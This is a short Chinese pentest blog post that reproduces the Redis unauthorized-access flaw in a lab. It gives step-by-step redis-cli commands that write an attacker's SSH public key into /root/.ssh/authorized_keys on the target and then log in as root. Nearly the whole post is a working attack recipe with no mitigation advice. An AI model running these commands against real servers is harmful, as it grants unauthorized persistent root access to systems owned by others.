Adminxe's Blog | 低调求发展 - 潜心习安全 ,技术永无止境 | 谢谢您对本站的支持,有什么问题或者建议请及时联系:点击这里给我发消息

redis未授权漏洞复现-写入公钥利用

渗透测试 Adminxe 704℃ 0评论
写入公钥

  1.  ssh-keygen -t rsa  //执行生成key命令

2.  (echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > 1.txt  //将公钥写入txt

3.  cat /root/.ssh/1.txt | ./redis-cli -h 192.168.0.111 -x set xxx  //将.ssh目录下的公钥文件1.txt 通过redis-cli客户端写入到目标主机缓冲中

4.  ./redis-cli -h 192.168.0.111    //使用客户端登录目标

     config set dir /root/.ssh      //设置存储公钥路径

     config set dbfilename authorized_keys  //设置文件名称

5.   get xxx      //查看缓存

      save     //保存缓存到目标主机路径及文件下

      exit    //退出

6. ssh 192.168.0.111  //成功登录

转载请注明:Adminxe's Blog » redis未授权漏洞复现-写入公钥利用

喜欢 (0)or分享 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址